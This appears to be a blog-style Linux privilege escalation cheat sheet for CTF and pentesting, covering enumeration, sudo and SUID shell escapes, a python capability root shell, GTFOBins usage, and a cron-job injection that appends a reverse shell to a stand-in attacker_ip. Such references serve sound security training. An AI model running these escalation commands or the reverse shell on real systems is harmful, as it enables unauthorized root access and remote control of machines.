Linux Privilege Escalation Techniques (Complete Guide)

๐Ÿ“… Published April 10, 2026 ยทlinuxprivilege-escalationpentestingred-team

Practical CTF + pentesting Linux privilege escalation reference


โœ๏ธ Written by Aryan Giri


โš ๏ธ Disclaimer

This content is for educational use only in authorized labs and CTF environments.


๐Ÿงญ 1. Initial Enumeration

Start with system recon.

root@ary_lap# uname -a
Linux ubuntu 5.15.0-91-generic x86_64 GNU/Linux
root@ary_lap# whoami
user
root@ary_lap# id
uid=1000(user) gid=1000(user)
root@ary_lap# cat /etc/os-release
Ubuntu 22.04 LTS

๐Ÿ” 2. Sudo Misconfigurations

Check sudo permissions:

root@ary_lap# sudo -l
User user may run:
    (ALL) NOPASSWD: /usr/bin/vim

Exploit example:

root@ary_lap# sudo vim -c ':!/bin/bash'
root@ary_lap# whoami
root

๐Ÿงฑ 3. SUID Binaries

root@ary_lap# find / -perm -4000 -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/find
/usr/bin/vim.basic

Exploit example:

root@ary_lap# find . -exec /bin/bash -p \;
root@ary_lap# whoami
root

โš™๏ธ 4. Linux Capabilities

root@ary_lap# getcap -r / 2>/dev/null
/usr/bin/python3 = cap_setuid+ep
root@ary_lap# python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@ary_lap# whoami
root

โฐ 5. Cron Jobs

root@ary_lap# cat /etc/crontab
* * * * * root /opt/backup.sh

If writable:

root@ary_lap# echo "bash -i >& /dev/tcp/attacker_ip/4444 0>&1" >> /opt/backup.sh

๐Ÿงช 6. PATH Hijacking

root@ary_lap# echo $PATH
/usr/local/sbin:/usr/bin:/bin

Exploit idea: create malicious binary earlier in PATH.


๐Ÿ”ฅ 7. GTFOBins (VERY IMPORTANT)

GTFOBins is a curated list of Unix binaries that can be abused for privilege escalation.

๐Ÿ”— Website:
https://gtfobins.github.io/


๐Ÿง  How to use GTFOBins effectively

Step 1: Identify vulnerable binary

Example:

sudo -l
/usr/bin/vim

Step 2: Search it on GTFOBins

Go to:

Step 3: Choose context

GTFOBins shows multiple abuse methods:

Step 4: Copy payload

Example from GTFOBins:

sudo vim -c ':!/bin/sh'

๐Ÿงช GTFOBins workflow in pentesting

1. find binary (sudo -l / SUID / running service)
2. search on GTFOBins
3. check execution context (sudo? suid? capabilities?)
4. use matching payload
5. escalate to root

๐Ÿงฌ 8. Kernel Exploits

root@ary_lap# uname -r
5.15.0-91-generic

Search exploit-db or local tools if outdated.


๐Ÿงฉ 9. Weak File Permissions

root@ary_lap# find / -writable -type f 2>/dev/null

๐Ÿง  Final Mindset

Privilege escalation is about:


๐Ÿ End

Stay consistent with enumeration โ†’ always inspect everything.